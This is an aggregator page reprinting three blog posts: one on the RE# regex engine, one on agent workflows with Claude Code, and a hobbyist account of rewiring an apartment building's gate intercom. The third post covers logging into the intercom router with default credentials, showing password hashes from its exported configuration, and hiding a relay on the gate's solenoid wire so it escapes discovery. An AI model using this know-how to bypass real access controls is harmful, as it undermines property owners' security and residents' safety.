the rea­son i’m writ­ing about this at all is that i’ve been work­ing on RE#, and i want to show that this prob­lem is ac­tu­ally pos­si­ble to solve. to the best of my knowl­edge, RE# is the first regex en­gine that can find all matches in two passes, re­gard­less of the pat­tern or the in­put, with­out al­ter­ing the se­man­tics.

the al­go­rithm does­n’t find matches one at a time. in­stead it does two passes over the en­tire in­put: a re­verse DFA marks where matches could start, then a for­ward DFA re­solves the longest match at each marked po­si­tion. by the time we con­firm a match, both di­rec­tions have al­ready been scanned. matches are re­ported retroac­tively rather than by restart­ing from each po­si­tion. the ll­match al­go­rithm sec­tion in the first post walks through this in de­tail.

one match or ten thou­sand, it’s the same two passes. same ex­am­ple as be­fore:

on pat­terns that pro­duce many matches - log pars­ing, data ex­trac­tion, search-and-re­place across large files - the dif­fer­ence be­tween O(n) and O(n²) is the dif­fer­ence be­tween instant” and why is this tak­ing so long”.

the matches are still left­most-longest (POSIX) - a|ab and ab|a give the same re­sults, boolean al­ge­bra works, and you can refac­tor pat­terns with­out chang­ing the out­put.

two passes elim­i­nate the n restarts, but the for­ward pass it­self still re­solves one match at a time. patho­log­i­cal pat­terns with am­bigu­ous match bound­aries can cause qua­dratic work within that pass. i wanted a mode that guar­an­tees lin­ear time even on ad­ver­sar­ial in­put, no ex­cep­tions. so i added a hard­ened mode to the en­gine.

hard­ened mode re­places the for­ward pass with an O(n * S) scan (where S is the num­ber of si­mul­ta­ne­ously ac­tive DFA states) that re­solves all match end­ings in a sin­gle pass, re­turn­ing ex­actly the same left­most-longest matches with no se­man­tic trade­off. on patho­log­i­cal in­put (.*a|b against a haystack of b’s), the dif­fer­ence is dra­matic:

nor­mal mode goes qua­dratic; hard­ened stays lin­ear. so why not make hard­ened the de­fault? i went back and forth on this.

the qua­dratic blowup re­quires a patho­log­i­cal pat­tern and a struc­tured in­put that’s long enough to cause a prob­lem. you need both halves. take a pat­tern like [A-Z][a-z]+: every match starts at an up­per­case let­ter and ends the mo­ment the en­gine sees some­thing that is­n’t low­er­case. there’s no am­bi­gu­ity about where a match ends, so the en­gine never res­cans the same in­put. for this pat­tern, the qua­dratic case is ac­tu­ally im­pos­si­ble. most real-world pat­terns share this prop­erty.

so im­pos­ing a 3-20x con­stant-fac­tor slow­down on every query to pro­tect against a case you’re un­likely to hit by ac­ci­dent felt wrong.

but if pat­terns are user-sup­plied, none of that holds. the at­tacker con­trols one half of the equa­tion and the com­pile time as well. you prob­a­bly won’t hit it” is ex­actly the kind of rea­son­ing that leads to pro­duc­tion in­ci­dents. in the end i kept the fast path as the de­fault, mostly be­cause the slow­down is real and mea­sur­able on every sin­gle query, while the patho­log­i­cal case re­quires a gen­uinely hos­tile com­bi­na­tion.

there’s also a prac­ti­cal re­al­ity: i’m try­ing to show that RE# is the fastest regex en­gine for com­mon work­loads. if the de­fault path is 20% slower on com­mon bench­marks, that’s what peo­ple see, not the qua­dratic fix. i won’t have it.

hard­ened mode is there for when you’re ac­cept­ing pat­terns from the in­ter­net and can’t trust what you’re get­ting - an ex­plicit opt-in rather than a silent tax on every­one.

pat­terns with lookarounds are cur­rently re­jected in hard­ened mode. there’s no the­o­ret­i­cal bar­rier, but the im­ple­men­ta­tion needs some work.

RE#’s hard­ened mode ex­tends Aho-Corasick’s ap­proach to full regexes, where match lengths aren’t known in ad­vance. in­stead of a trie it holds a set of ac­tive match can­di­dates, ad­vanc­ing all of them on each in­put char­ac­ter us­ing de­riv­a­tives. new can­di­dates are only added at po­si­tions al­ready con­firmed as valid match be­gin­nings by the re­verse pass, so the en­gine never wastes work on po­si­tions that can’t start a match. the re­sult is the same prop­erty Aho-Corasick has al­ways had, lin­ear-time all-matches, but for regexes.

so how does RE#’s nor­mal mode com­pare to Aho-Corasick on its home turf? here’s a bench­mark with a dic­tio­nary of 2663 words as a word1|word2|…|wordN al­ter­na­tion, matched against ~900KB of eng­lish prose - ex­actly the kind of work­load Aho-Corasick was de­signed for. RE# just com­piles it as a reg­u­lar regex:

how is this pos­si­ble when RE# is do­ing more work - two passes in­stead of one? it comes down to cache be­hav­ior. Aho-Corasick builds the full au­toma­ton up­front - for 2663 words that’s a large DFA with many states and un­pre­dictable jumps be­tween them, lead­ing to cache misses and branch mis­pre­dic­tions. rust regex uses a sin­gle lazily-com­piled DFA, which helps, but the state space for a large al­ter­na­tion is still sub­stan­tial. RE#’s de­riv­a­tive-based DFAs are lazily built and more com­pact - the two au­tomata (forward and re­verse) each have far fewer states than the equiv­a­lent full trie or NFA-based DFA, so tran­si­tions hit warm cache lines more of­ten.

RE# hard­ened is do­ing un­nec­es­sary work here - as with [A-Z][a-z]+ above, this pat­tern has un­am­bigu­ous match bound­aries, so hard­en­ing adds noth­ing. this loss is­n’t in­evitable. we can in­fer at com­pile time that hard­en­ing is­n’t needed for pat­terns like these, but there are higher pri­or­i­ties right now.

to be clear, for a smaller set of strings and a fully built au­toma­ton that fits com­fort­ably in L1 cache, Aho-Corasick would be the right choice - it only needs one pass while RE# scans twice. the re­sult above is spe­cific to large pat­terns where cache pres­sure mat­ters.

speak­ing of higher pri­or­i­ties - in the pre­vi­ous post i de­scribed how skip ac­cel­er­a­tion works and where RE# was los­ing to regex on lit­eral-heavy pat­terns. since then i’ve been clos­ing those gaps with hand-writ­ten AVX2 and NEON im­ple­men­ta­tions - rare byte search, teddy multi-po­si­tion match­ing, and range-based char­ac­ter class scan­ning.

these used to be sig­nif­i­cant losses. clos­ing them was one of the more sat­is­fy­ing things to get work­ing. i was also ea­ger to see how RE# per­forms on re­bar, BurntSushi’s bench­mark suite for regex en­gines:

RE# does very well here now - most num­bers are within noise thresh­old of regex. the few dif­fer­ences here and there come down to byte fre­quency ta­bles and al­go­rith­mic choices in the skip loop. for con­text, a DFA by it­self gets you some­where near 1 GB/s. CPU vec­tor in­trin­sics can op­por­tunis­ti­cally push that to 40+ on pat­terns where most of the in­put can be skipped.

since RE# matches in re­verse, you might be won­der­ing whether it can work on streams:

any pat­tern + left­most-longest se­man­tics = no. this is­n’t an en­gine lim­i­ta­tion - it’s in­her­ent to the se­man­tics. if you ask for the longest match on an in­fi­nite stream, the an­swer might be keep go­ing for­ever.” you might think left­most-greedy avoids this since it works left-to-right, but it does­n’t - .*a|b on a stream of b’s has the same prob­lem, the .*a branch keeps scan­ning for­ward look­ing for the last a that may never come.

pat­tern with an un­am­bigu­ous end bound­ary = yes. some pat­terns al­ready have un­am­bigu­ous bound­aries and work fine as-is. for the ones that don’t, in RE# you can in­ter­sect with a bound­ary - ^.*$ for lines, ~(_*\n\n_*) for para­graphs (where ~(…) is com­ple­ment and _* matches any string), or any de­lim­iter you want - and now the pat­tern is com­pat­i­ble with stream­ing. in the pre­vi­ous post i showed how you can in­ter­sect a regex with valid utf-8”, here, you can in­ter­sect with up to the next new­line” or up to the end of the sec­tion”, even if the orig­i­nal pat­tern is user-sup­plied and does not have this prop­erty. it is a nice and gen­eral tech­nique.

any pat­tern + ear­li­est se­man­tics = yes. re­port a match the mo­ment the DFA en­ters a match state, no need to scan fur­ther. this is what Hyperscan does - it works on streams be­cause it never needs to look ahead.

the API does­n’t ex­pose a stream­ing in­ter­face yet - find­_all takes &[u8] - but chun­ked stream­ing is on the list.

worth be­ing up­front about the lim­i­ta­tions:

no cap­ture groups - RE# re­turns match bound­aries only, not sub-group cap­tures. this is­n’t im­pos­si­ble - cap­tures are a post-match op­er­a­tion that can be lay­ered on top. the rea­son is we haven’t found the right way to do it yet. with in­ter­sec­tion and com­ple­ment, every subex­pres­sion would naively be­come a cap­ture group - (a.*&.*b) has two im­plicit groups, and com­ple­ment cre­ates more. in tra­di­tional regex, (?:…) ex­ists to opt out of cap­tur­ing, but the more i think about it the more ?: feels like a his­tor­i­cal mis­take - it makes the de­fault be­hav­ior (capturing) the one that opts you into a much slower al­go­rithm, even when you don’t need it. i’d rather get the de­sign right than ship some­thing awk­ward.

in the mean­time, you can use an­other en­gine to ex­tract cap­tures post-match - with \A an­chors on the al­ready-known match bound­aries, the over­head is­n’t that bad.

no lazy quan­ti­fiers - .*? is­n’t sup­ported. RE# uses left­most-longest (POSIX) se­man­tics, which is the math­e­mat­i­cally un­am­bigu­ous in­ter­pre­ta­tion. lazy quan­ti­fiers are a back­track­ing con­cept that does­n’t trans­late to this model.

cap­ture groups may come even­tu­ally, but lazy quan­ti­fiers are a de­lib­er­ate ar­chi­tec­tural choice. if you need cap­tures to­day, use regex. if you need the prop­er­ties RE# of­fers (boolean op­er­a­tors, lookarounds, true-lin­ear all-matches, POSIX se­man­tics), these lim­i­ta­tions are un­likely to mat­ter.

as a side note - to put RE#’s boolean op­er­a­tors to prac­ti­cal use, i built a grep tool called re. the main thing it adds over (rip)?grep is multi-term boolean search with scop­ing - re­quire mul­ti­ple pat­terns to co-oc­cur on the same line, para­graph, or within N lines of each other:

# un­safe code with un­wrap co-lo­cated within 5 lines

re –near 5 -a un­safe -a un­wrap src/

# list all files both con­tain­ing serde and async

re –scope file -a serde -a async src/

you can also use full RE# pat­terns - re ([0-9a-f]+)&(_*[0-9]_*)&(_*[a-f]_*)’ src/ finds hex strings con­tain­ing both a digit and a let­ter. you could do this with a pipeline of greps, but it’s one pass with all the con­text in­for­ma­tion pre­served.

it’s still early, but i’ve been us­ing it daily and i think there’s a lot of po­ten­tial here.

i think i’ll rest for a bit af­ter this. i can only do 80-hour weeks for so long, and even though i have a lot more to share, it’ll have to wait. there’s also a pa­per that’s been con­di­tion­ally ac­cepted at PLDI - i’ll write about it prop­erly once it’s out. the rust RE# it­self is­n’t quite ready for a for­mal 1.0 an­nounce­ment yet, but we’re get­ting closer.

...

Read the original on iev.ee »

9 247 shares, 10 trendiness

How I’m Productive with Claude Code

It’s been about 6 weeks since I joined Tano, and this is what my com­mit his­tory looks like:

Commits are a ter­ri­ble met­ric for out­put, but they’re the most vis­i­ble sig­nal I have. Something real changed in how I work, and the com­mit count is a side ef­fect.

So, what has changed?

When I joined Tano, I was mak­ing every pull re­quest by hand. Stage changes, write the com­mit mes­sage, craft the PR de­scrip­tion, push, cre­ate the PR on GitHub. Standard process, it was fine.

It took me a while to re­al­ize this is grunt work. I was so used to do­ing it that I’d never ques­tioned it.

That was the first real shift: I’m not the im­ple­menter any­more. I’m the man­ager of agents do­ing the im­ple­men­ta­tion. And man­agers au­to­mate their team’s grunt work.

Then I wrote my first Claude Code skill: /git-pr.

It does every­thing I used to do, ex­cept it does it bet­ter. The PR de­scrip­tions are more thor­ough than what I’d write, be­cause it reads the full diff and sum­marises the changes prop­erly. I’d got­ten so used to the drudgery that I’d stopped notic­ing it was drudgery.

The time saved mat­ters, but the real un­lock was the men­tal over­head re­moved. Every PR used to be a small con­text switch: stop think­ing about the code, start think­ing about how to de­scribe the code. Now I type /git-pr and move on to the next thing.

Reviewing changes had this an­noy­ing loop.

Preview changes lo­cally, go away from what I’m work­ing on, kill the dev server, restart it on the new branch, check it all works, re­view the code.

The server build took about a minute, which was ag­o­nis­ingly long when I was mid-con­text-switch. Long enough to break fo­cus, too short to do any­thing use­ful.

I switched the build to SWC, and server restarts dropped to un­der a sec­ond. This sparked joy.

It sounds like a small change. It was­n’t. Sub-second restarts mean you never leave the flow. Save a file, the server’s al­ready up, check the pre­view. There’s no gap where your at­ten­tion drifts. It’s the dif­fer­ence be­tween a con­ver­sa­tion with awk­ward pauses and one that flows nat­u­rally.

Before this, I checked every UI change. Preview lo­cally, eye­ball it, de­cide if it matches what I ex­pected. It worked, but it meant I was a bot­tle­neck on every fea­ture.

After the Chrome ex­ten­sion kept crash­ing, I switched to the pre­view fea­ture in Claude Code. It lets the agent set up a pre­view, per­sist ses­sion data, and see how the UI ac­tu­ally looks.

I wired it into the work­flow: a change is­n’t done” un­til the agent has ver­i­fied the UI it­self. That meant I could del­e­gate ver­i­fi­ca­tion and only step in for fi­nal re­view — which also meant agents could run much longer with­out over­sight. They’d catch their own mis­takes. That mat­tered more than I re­al­ized at the time.

Fast re­builds and au­to­mated pre­views made an­other fric­tion vis­i­ble: I could only com­fort­ably work on one thing at a time.

I was re­view­ing PRs from other agents and team­mates. The work­flow was painful: check out the PR branch on main, re­build, test. But that would mess with my un­com­mit­ted changes. So I’d stash, check­out, re­build, test, switch back, pop the stash. Or cre­ate a work­tree man­u­ally, set it up, try to run the pre­view - only to find the ports clash­ing with my other run­ning server.

Our app has a fron­tend and a back­end, each need­ing its own port. Every work­tree shared the same en­vi­ron­ment vari­ables, so they’d all try to bind to the same ports. Running two things at once was a fight.

I built a sys­tem around this. Whenever a work­tree is cre­ated, every server gets as­signed ports from a unique range. No col­li­sions. I could run ten pre­views si­mul­ta­ne­ously if I wanted.

I went from get­ting over­whelmed by two par­al­lel branches to run­ning five work­trees at once. My cre­ate loop changed: fire off mul­ti­ple agents on sep­a­rate work­trees, each build­ing a dif­fer­ent fea­ture. They’d only stop once they’d ver­i­fied the UI them­selves.

I’d be heav­ily in­volved in plan­ning. Then I’d dis­ap­pear un­til code re­view. Agents catch­ing their own mis­takes mat­tered a lot more with five run­ning at once.

Reviewing got smoother too. No faffing around with setup. No re­build­ing. No port con­flicts. Just: read, ver­ify, merge. Next.

My role has changed. I used to de­rive joy from fig­ur­ing out a com­pli­cated prob­lem, spend­ing hours craft­ing the per­fect UI. I still do that some­times, but a lot less now. What’s be­come more fun is build­ing the in­fra­struc­ture that makes the agents ef­fec­tive. Being a man­ager of a team of ten ver­sus be­ing a solo dev. And like any good man­ager, you get to claim credit for all the work your team” does.

These aren’t glam­orous prob­lems. They’re plumb­ing. But plumb­ing de­ter­mines whether you’re in flow or wrestling your en­vi­ron­ment.

The high­est-lever­age work I’ve done at Tano has­n’t been writ­ing fea­tures. It’s been build­ing the in­fra­struc­ture that turned a trickle of com­mits into a flood.

Each of these stages re­moved a dif­fer­ent kind of fric­tion:

/git-pr re­moved the fric­tion of for­mat­ting - turn­ing code changes into a pre­sentable PR.

SWC re­moved the fric­tion of wait­ing - the dead time be­tween mak­ing a change and see­ing it.

The pre­view re­moved the fric­tion of ver­i­fy­ing changes - I could quickly see what’s hap­pen­ing.

The work­tree sys­tem re­moved the fric­tion of con­text-switch­ing - jug­gling mul­ti­ple streams of work with­out them col­lid­ing.

And each time I re­moved one, the next be­came vis­i­ble. When PRs were ef­fort­less, I no­ticed I was wast­ing time on re­builds. When re­builds were in­stant, I no­ticed I could­n’t run things in par­al­lel. Classic the­ory of con­straints — fix one, and the sys­tem im­me­di­ately shows you the next one.

The na­ture of the work changed. I’m not using a tool that writes code.” I’m in a tight loop: kick off a task, the agent writes code, I check the pre­view, read the diff, give feed­back or merge, kick off the next task. The feed­back loop is so tight that there’s no gap for my at­ten­tion to leak out.

Building things is a dif­fer­ent kind of fun now — it’s so fast that the game be­comes im­prov­ing the speed. How much faster can I go? When the loop is tight enough, en­gi­neer­ing be­comes the en­ter­tain­ment.

...

Read the original on neilkakkar.com »

10 244 shares, 17 trendiness

Box of Secrets

My friend Frank (not his real name) hosts a lot of guests at his apart­ment, and his com­plex’s in­ter­com is what ush­ers them in­side. You’ve prob­a­bly seen them be­fore, they look like this:

Up un­til re­cently, guests could find Frank’s num­ber in the sys­tem and give it a call. If Frank rec­og­nized the peo­ple on the line, he would press a num­ber on his dial pad, which the con­troller would in­ter­pret as a sig­nal to un­lock the gate.

Then, man­age­ment got lazy. The com­plex Frank lives in failed to re­new their in­ter­com’s cel­lu­lar ser­vice, so it could no longer make calls for the voice sys­tem. Even af­ter months of ask­ing his land­lord to fix it, noth­ing was done.

My other friend Hazel and I ar­rived to visit Frank dur­ing this out­age pe­riod, and he asked us to see what we could do. Here’s what we saw:

We in­spected the top box closer, giv­ing a promis­ing re­sult: it was un­locked! The gen­eral lay­out of the box is as fol­lows:

It was im­pos­si­ble to ig­nore the mas­sive Wi-Fi/cell router in the top cor­ner with its ad­min pass­word printed right on it (not pic­tured). Of course, I had to in­ves­ti­gate.

I quickly found the net­work and en­tered the lo­gin cre­den­tials shown. Of course, they weren’t changed from the de­faults. I had full ad­min ac­cess to the router, which was awe­some, un­til I re­al­ized that I could­n’t do very much with its ba­sic, locked-down in­ter­face. This al­most ended my ex­plo­ration, but then I re­al­ized: what about SSH?

AT&T, the com­pany that makes the routers for Doorking, is smarter than a bag of rocks in that SSH is pro­tected on their router. Sadly for them, they lose to the bag of rocks in pro­vid­ing a way to down­load their en­tire sys­tem con­fig­u­ra­tion from the web in­ter­face, con­tain­ing a way to re­set the root pass­word to what­ever you want:

# This file is an ex­ported con­fig­u­ra­tion from NetComm Bovine plat­form based de­vice.

# Private fields are en­crypted but any con­fig­u­raiton en­try can be man­u­ally re­placed by

# a plain-text vari­able or URI-encoded text.

ad­min.fire­wall.en­able;1

ad­min.lo­cal.en­able_http;1

ad­min.lo­cal.en­able_https;1

ad­min.lo­cal.ssh_en­able;1

ad­min.lo­cal.tel­neten­able;1

ad­min.open.port;

ad­min.pass­word;

ad­min.user.ad­min;$aM9Vdm­Coc5vuekVU70/​Gl8i­J­TOu­jxMQo

ad­min.user.root;$DDDg­p0GJy6n­B29UX7pDl­rUUKD­kWYqp84

Wow. I now see why router vul­ner­a­bil­i­ties are so com­mon.

This was cer­tainly a promis­ing av­enue, but we re­al­ized some­thing: even if we gained code ex­e­cu­tion on the router, we would have to fig­ure out its cus­tom se­r­ial pro­to­col to even have a chance at talk­ing to the main con­trol box. This was­n’t some­thing Hazel and I wanted to spend our en­tire va­ca­tion do­ing, so we de­cided to look else­where.

Looking at the other ter­mi­nals within the box, we saw the PH LINE phone con­nec­tors for each sys­tem. This was promis­ing, since Frank’s ex­ist­ing in­ter­com sys­tem used DTMF sig­nals to open the gate back when it was work­ing.

However, it was un­likely that the main con­trol box would blindly ac­cept any phone com­mands while not ac­tively lis­ten­ing for them af­ter a user had asked it to. It would’ve been pos­si­ble to test this hy­poth­e­sis, but we were again left with the re­al­ity of ex­tremely lim­ited de­bug­ging ca­pa­bil­i­ties, in ad­di­tion to min­i­mal knowl­edge of phone sig­nal­ing sys­tems.

Hazel and I knew there had to be some vul­ner­a­bil­ity in the sys­tem that would al­low us to in­ject our own com­mands into the gate con­trol sys­tem. We were cor­rect, but we first needed a change in per­spec­tive. Our ini­tial as­sump­tion was that we needed to take top-down con­trol over the sys­tem to make it do what we wanted. After our pre­vi­ous fail­ures to do so, we changed our goal to take bot­tom-up con­trol of the sys­tem: un­der­min­ing it at its core.

We ex­panded our search past the voice box to the main junc­tion box that routed the wires be­tween the voice box and the (inaccessible) main con­troller. After un­screw­ing two flat­head screws, we were met with an in­ter­est­ing sur­prise: an ex­tra ca­ble we did­n’t ex­pect. Tracing the ca­ble led to a rev­e­la­tion: the main con­trol box con­trols the so­le­noid, the me­chan­i­cal de­vice re­spon­si­ble for un­lock­ing the gate, through the junc­tion box!

Having ac­cess to the so­le­noid con­trol wire changed our ap­proach dra­mat­i­cally. Solenoids are just elec­tro­mag­nets that have two states: un­pow­ered (locked) and pow­ered (unlocked); no se­cu­rity mea­sures, no pro­to­cols to snoop. With this easy ac­cess point, we could just ap­ply our own power to the so­le­noid to un­lock the gate. In ad­di­tion, the 12 volt DC aux­il­iary power from a ter­mi­nal in the voice box would be per­fect to power a mi­cro­con­troller.

Here is the plan we came up with:

* Split the wire that runs to the lock hous­ing and trig­gers the so­le­noid. Connect the split end to a Wi-Fi-enabled ESP32 re­lay board.

* Write firmware in Rust to turn the ESP32 into a Matter client that we can con­nect to Frank’s Apple Home.

* Hide the board in­side the lit­tle junc­tion box, con­ve­niently placed there by the build­ing for max­i­mum dis­creet­ness.

* Power the board by plug­ging a power ca­ble into the Doorking voice box and run­ning the ca­ble into the junc­tion.

It was time to or­der parts. Thankfully Hazel found an ESP32 re­lay board that did ex­actly what we wanted, hav­ing two re­lays to con­trol the so­le­noid. The cir­cuit ended up look­ing like this:

This setup en­sures that if our cir­cuit were to fail, the sys­tem would still re­main fully func­tional since the gate con­trol com­mands are passed through when no power is ap­plied to the re­lay.1

Once we had the hard­ware set, next up was the soft­ware. We chose to use a Matter li­brary writ­ten in Rust with spe­cial­iza­tions for the ESP32. This would al­low us to use an open stan­dard (with freely ac­ces­si­ble specs, no file­type:pdf dig­ging nec­es­sary!) to con­nect to Frank’s Apple Home setup.

The soft­ware can be de­scribed by this state ma­chine:

It’s pretty sim­ple. Startup and con­nect to the net­work. Once con­nected, start lis­ten­ing for com­mands from the home. When in­structed, un­lock the gate for a cer­tain amount of time (user con­fig­urable with a de­fault time of ten sec­onds), then re-lock the gate. Importantly, the soft­ware will never let the gate stay un­locked in­def­i­nitely, en­sur­ing the sys­tem re­mains se­cure. You can look at the code your­self here.

One par­tic­u­larly in­fu­ri­at­ing is­sue we en­coun­tered dur­ing de­vel­op­ment was the ESP32s very lim­ited RAM space. Launching both the Wi-Fi and Bluetooth stacks to­gether would al­most al­ways cause mem­ory cor­rup­tion due to over­al­lo­ca­tion, lead­ing to a hard re­set af­ter in­valid mem­ory ac­cess. The Matter im­ple­men­ta­tion we used uti­lized the ESP32s older Bluedroid Bluetooth stack in­stead of the newer NimBLE, mak­ing the prob­lem even worse. After man­u­ally tweak­ing the size of the stack for a long time, even with the help of Claude Code we were un­able to get it sta­ble. However, there was a so­lu­tion in store: only en­able ei­ther Wi-Fi or Bluetooth, and have Claude dump a bunch of mem­ory-sav­ing con­fig set­tings into sd­kcon­fig.de­faults. Bluetooth is only nec­es­sary for the pro­vi­sion­ing process, and Wi-Fi is only nec­es­sary for reg­u­lar op­er­a­tion. There is a small win­dow dur­ing the pro­vi­sion­ing process where both need to be ac­tive, but this is short enough to not cause prob­lems. Now, in nor­mal op­er­a­tion the ESP32 im­me­di­ately dis­ables Bluetooth, elim­i­nat­ing the prob­lem.

Once we han­dled all of the edge cases, the de­vice showed up in Apple Home!

Fun fact, you can set the man­u­fac­turer in­for­ma­tion to what­ever you’d like:

Once we had the soft­ware run­ning per­fectly, we moved on to de­ploy­ing the de­vice. Luckily, the board we bought fit per­fectly into the small junc­tion box that started us down this path, so it would be com­pletely in­vis­i­ble to any­one who passed by. Hazel had al­ready run power lines from the voice box to the junc­tion box, and we had al­ready pur­chased a Wi-Fi ex­ten­der to en­sure the sig­nal was strong, so all we needed to do is hook things in. After a lot of care­ful splic­ing by Hazel, it was in­stalled! We con­nected power in the voice box, aaaaannnnnnd­ddddd… noth­ing. No power.

This was bad. Something had bucked our ex­pec­ta­tions, but we had no idea what. Frank did­n’t have a mul­ti­me­ter, so we were stuck try­ing to fig­ure out if there was a fray in the power wire, or if there was maybe a blown com­po­nent on our board, or any num­ber of other po­ten­tial prob­lems. ‌Eventually I got an idea: Frank owns a cord­less drill. After rum­mag­ing around in his tool closet, I found what I was look­ing for: a cord­less drill bat­tery, rated to out­put 20 volts. I ran down­stairs, con­nected it to the power wires, and eu­reka! It worked! The board fired up and con­nected to Apple Home. This was a wild feel­ing, be­ing able to un­lock the gate be­fore I even got to it.

While it felt re­ally good to know that the pro­ject could work, we needed to fig­ure out what was go­ing on with the power. After some dig­ging I came across the ser­vice man­ual for the voice box, and I found some­thing that should’ve been ob­vi­ous: the 12 volt aux port was an in­put, not an out­put, for power sources such as so­lar pan­els. It was frus­trat­ing for us to dis­cover this fact, but at least our board was func­tional. After a quick search I or­dered a rec­ti­fy­ing reg­u­la­tor that con­verts the 18 volt AC in­put to 12 volts DC. Shipping took for­ever, but once it ar­rived it fit right in along­side the ESP32 board in­side the junc­tion box. I con­nected it to the known-work­ing AC power for the voice box, and power started flow­ing! We closed every­thing up, and we were done.

Hazel and I are su­per proud of our lit­tle box of se­crets, and Frank could­n’t be hap­pier. With his new­found ca­pa­bil­ity to un­lock the gate through Apple Home,

* Frank can un­lock the build­ing gate for him­self with an easy tap on his phone, or re­motely let guests in again with­out the in­ter­com.

* Frank’s Home guests can now un­lock both the build­ing gate and his apart­men­t’s smart lock from the Home app; it’s now an all-in-one way for them to eas­ily en­ter his apart­ment.

As a bonus, the as­sem­bly is very dis­creet: it’s just one ESP32 and a small power de­vice hid­den in a screw-se­cured junc­tion box that does­n’t in­ter­fere with the build­ing’s pri­mary ac­cess con­trol sys­tem, giv­ing it a much bet­ter chance of avoid­ing dis­cov­ery.

This was such a fun pro­ject to work on, and it al­lowed me to dip my toes into cir­cuit hack­ing, some­thing I don’t get to do nearly enough. The com­po­nents for this pro­ject are all su­per sim­ple, so if you’re in the same po­si­tion as Frank, give it a try! Tag me on Twitter if you get it work­ing!

...

Read the original on jackhogan.me »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.